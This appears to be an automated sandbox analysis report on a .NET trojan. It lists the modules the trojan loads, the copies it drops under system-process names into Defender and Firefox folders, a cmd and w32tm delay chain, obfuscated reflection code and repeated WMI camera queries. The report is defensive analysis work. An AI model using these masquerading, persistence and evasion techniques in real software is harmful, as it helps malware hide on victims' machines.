                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490D8C38
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490D58A0
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490D28C7
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490DA72B
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490D8BB8
                              Source: 4Osfx7gnSx.exe, 00000000.00000000.1985266085.0000000000CB6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 4Osfx7gnSx.exe
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2007578949.000000001BA12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 4Osfx7gnSx.exe
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2007578949.000000001BA12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs 4Osfx7gnSx.exe
                              Source: 4Osfx7gnSx.exe | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 4Osfx7gnSx.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: apphelp.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: version.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: ntmarta.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: propsys.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: dlnashext.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: wpdshext.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: edputil.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: urlmon.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: iertutil.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: srvcli.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: netutils.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: wintypes.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: appresolver.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: bcp47langs.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: slc.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: userenv.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: sppc.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Section loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                              Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: mscoree.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: apphelp.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: kernel.appcore.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: version.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: windows.storage.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: wldp.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: profapi.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: cryptsp.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: rsaenh.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: cryptbase.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: sspicli.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: rasapi32.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: rasman.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: rtutils.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: mswsock.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: winhttp.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: ondemandconnroutehelper.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: iphlpapi.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: dhcpcsvc6.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: dhcpcsvc.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: dnsapi.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: uxtheme.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: wbemcomn.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: amsi.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: userenv.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: winmm.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: winmmbase.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: mmdevapi.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: devobj.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: ksuser.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: avrt.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: audioses.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: powrprof.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: umpdc.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: msacm32.dll
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Section loaded: midimap.dll
                              Source: 4Osfx7gnSx.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: 4Osfx7gnSx.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RuntimeBroker.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dllhost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: izvoheVaDbpPfPMLrEwQFH.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Idle.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.cs | Cryptographic APIs: 'CreateDecryptor'
                              Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/16@0/1
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4Osfx7gnSx.exe.log
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\f5385fc79e9021f657c18cf7058843ccdc6f204c6038281856b86882f1fd12ee
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Mutant created: NULL
                              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | File created: C:\Users\user\AppData\Local\Temp\bGXwwcwHIx
                              Source: 4Osfx7gnSx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 4Osfx7gnSx.exeReversingLabs: Detection: 68%
                              Source: 4Osfx7gnSx.exeVirustotal: Detection: 58%
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile read: C:\Users\user\Desktop\4Osfx7gnSx.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\4Osfx7gnSx.exe C:\Users\user\Desktop\4Osfx7gnSx.exe
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe "C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe"
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\5940a34987c991
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Directory created: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Directory created: C:\Program Files\Mozilla Firefox\fonts\9e8d7a4ca61bd9
                              Source: 4Osfx7gnSx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 4Osfx7gnSx.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 4Osfx7gnSx.exe Static file information: File size 1649152 > 1048576
                              Source: 4Osfx7gnSx.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x192200
                              Source: 4Osfx7gnSx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.cs .Net Code: Type.GetTypeFromHandle(HQBXVmsmuarlqIodyrE.vPhUiYtNqHV(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(HQBXVmsmuarlqIodyrE.vPhUiYtNqHV(16777246)),Type.GetTypeFromHandle(HQBXVmsmuarlqIodyrE.vPhUiYtNqHV(16777260))})
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Code function: 0_2_00007FF848F200BD pushad ; iretd 0_2_00007FF848F200C1
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Code function: 6_2_00007FF848F100BD pushad ; iretd 6_2_00007FF848F100C1
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Code function: 6_2_00007FF8490D3E1D push E95F3305h; ret 6_2_00007FF8490D3E99
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Code function: 6_2_00007FF8490D4665 push edi; retf 6_2_00007FF8490D4667
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Code function: 6_2_00007FF8490E589D push cs; retf 6_2_00007FF8490E597F
                              Source: 4Osfx7gnSx.exe Static PE information: section name: .text entropy: 7.425665296125914
                              Source: RuntimeBroker.exe.0.dr Static PE information: section name: .text entropy: 7.425665296125914
                              Source: dllhost.exe.0.dr Static PE information: section name: .text entropy: 7.425665296125914
                              Source: izvoheVaDbpPfPMLrEwQFH.exe.0.dr Static PE information: section name: .text entropy: 7.425665296125914
                              Source: Idle.exe.0.dr Static PE information: section name: .text entropy: 7.425665296125914

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File written: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File created: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File created: C:\Program Files (x86)\Microsoft.NET\Idle.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe File created: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
